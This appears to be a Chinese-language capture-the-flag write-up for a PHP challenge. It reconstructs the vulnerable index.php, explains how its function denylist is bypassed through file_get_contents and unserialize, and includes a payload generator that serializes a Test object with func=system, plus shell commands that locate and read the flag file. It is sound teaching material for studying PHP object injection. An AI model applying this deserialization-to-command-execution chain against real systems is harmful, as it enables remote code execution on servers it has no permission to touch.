call_user_func
用 file_get_contents 函数读取 index.php 的源码：func 参数会被原样交给 call_user_func，而 file_get_contents 不在下面的黑名单里，所以请求 ?func=file_get_contents&p=index.php 即可拿到文件内容。
<?php
// Reconstructed from the challenge's index.php (the listing on this page was
// garbled by the renderer into one character per line). Behaviour is
// unchanged; the comments mark the weaknesses the write-up relies on.

// Denylist of callables the direct ?func= path refuses. Note what is NOT in
// it: unserialize, file_get_contents, readfile, include, ... Also note the
// typo "registregister_shutdown_function" (register_shutdown_function itself
// is therefore not blocked) and the duplicated "array_walk".
$disable_fun = array(
    "exec", "shell_exec", "system", "passthru", "proc_open", "show_source",
    "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch",
    "escapeshellcmd", "escapeshellarg", "assert", "substr_replace",
    "call_user_func_array", "call_user_func", "array_filter", "array_walk",
    "array_map", "registregister_shutdown_function", "register_tick_function",
    "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
    "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite",
    "file_put_contents",
);

/**
 * Call $func with the single argument $p and return the result if it is a
 * string, otherwise "".
 *
 * This is the sink: $func is whatever callable name the caller supplies and
 * call_user_func applies no allow-list of its own. The $disable_fun check is
 * performed only by the request handler below, so any other path into
 * gettime() — in particular Test::__destruct() — bypasses it entirely.
 */
function gettime($func, $p) {
    $value = call_user_func($func, $p);
    // Only string results are returned; ints, bools, arrays, null become "".
    if (gettype($value) == "string") {
        return $value;
    }
    return "";
}
/**
 * Gadget class. Its only behaviour lives in __destruct: when the object is
 * released, gettime($this->func, $this->p) runs — an arbitrary callable with
 * an arbitrary string argument, and WITHOUT the $disable_fun check done by
 * the request handler. Any way of creating a Test with attacker-chosen
 * properties (unserialize() of request data) therefore yields code execution.
 */
class Test {
    public $p = "Y-m-d h:i:s a";
    // Default gadget is date("Y-m-d h:i:s a"). NOTE(review): this line is
    // garbled on the page; "date" is inferred from the format string in $p.
    public $func = "date";

    function __destruct() {
        // Runs at object release / script shutdown, outside the denylist check.
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
// Request handler. Both values come from $_REQUEST (GET, POST or cookie),
// i.e. they are fully attacker-controlled.
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    // PHP function names are case-insensitive, so lower-casing defeats
    // "SyStEm"-style evasion — but this is a denylist and it is only applied
    // here; gettime() and Test::__destruct() never see it.
    $func = strtolower($func);
    // Loose in_array(): the list holds only non-numeric strings, so no
    // type-juggling match is possible, but any unlisted name such as
    // "unserialize" or "file_get_contents" passes straight through.
    if (in_array($func, $disable_fun)) {
        die("Hacker...");
    }
    echo gettime($func, $p);
}
?>
可以看到 index.php 用黑名单过滤了很多函数，但黑名单只在直接传入 func 的分支里检查，而且并没有包含 unserialize（另外 "registregister_shutdown_function" 写错了，register_shutdown_function 实际上也没被拦截）。Test 类的 __destruct 会不经过黑名单直接调用 gettime($this->func, $this->p)，因此构造一个 func=system、p=命令 的 Test 对象序列化串，以 func=unserialize&p=<序列化串> 提交：unserialize 创建对象后，脚本结束时析构函数就会执行 system(命令)。下面的代码用来生成该序列化串：
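<?php
/**
 * Payload generator for the Test gadget.
 *
 * Only the property names and values matter: serialize() never records
 * methods, so __destruct() is deliberately left out. Copying the target's
 * destructor into this script would make PHP call gettime() on shutdown,
 * which is undefined here (fatal error after the payload is printed) — or,
 * if it were defined, would run the command on the attacker's own machine.
 *
 * On the target, unserialize() recreates Test with these values and its
 * destructor calls gettime("system", "find / -name flag*") without the
 * denylist check.
 */
class Test {
    public $p = "find / -name flag*";
    public $func = "system";
}

$payload = new Test();
// Expected output:
// O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
// URL-encode it before placing it in the p parameter (spaces, quotes, ';', '*').
echo serialize($payload);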
find / -name "flag*"：作为 Test 的 p 属性交给 system 执行，列出文件名以 flag 开头的所有文件（* 是 shell 通配符，写进 URL 时要做编码）。
cat /tmp/flagoefiu4r93：把 p 属性改成这条命令，重新生成并提交序列化串，即可读取 flag 文件内容。